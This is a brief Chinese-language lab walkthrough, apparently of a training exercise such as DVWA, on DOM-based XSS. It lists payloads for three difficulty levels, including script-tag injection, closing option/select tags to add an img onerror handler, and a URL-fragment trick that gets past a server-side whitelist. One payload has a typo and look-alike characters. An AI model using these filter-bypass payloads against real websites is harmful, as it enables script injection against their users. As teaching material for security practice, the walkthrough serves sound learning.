Dom型XSS
Dom型XSS是一种XSS攻击,其中攻击的代码是由于受害者浏览器页面的DOM树而执行的特殊的地方就是代码攻击(payload)
在浏览器本地修改Dom树而执行,并不会将payload上传到服务器,这也使得DOM型XSS比较难以检测
Low
简单难度没有参数过滤,直接修改下拉框上传参数的值
default=<script>alert(/xss/)</script>
Medium
过滤了<script>标签
闭合</option></select>标签构造xss事件
</option></select><img sec="" οnerrοr=alert(/xss/)>
high
查看服务器端源代码
default=只允许是French、English、German、Spanish、这几个通过。(采用了白名单过滤)
default=English#</option></select><img src="" οnerrοr=alert(/xss/)></option>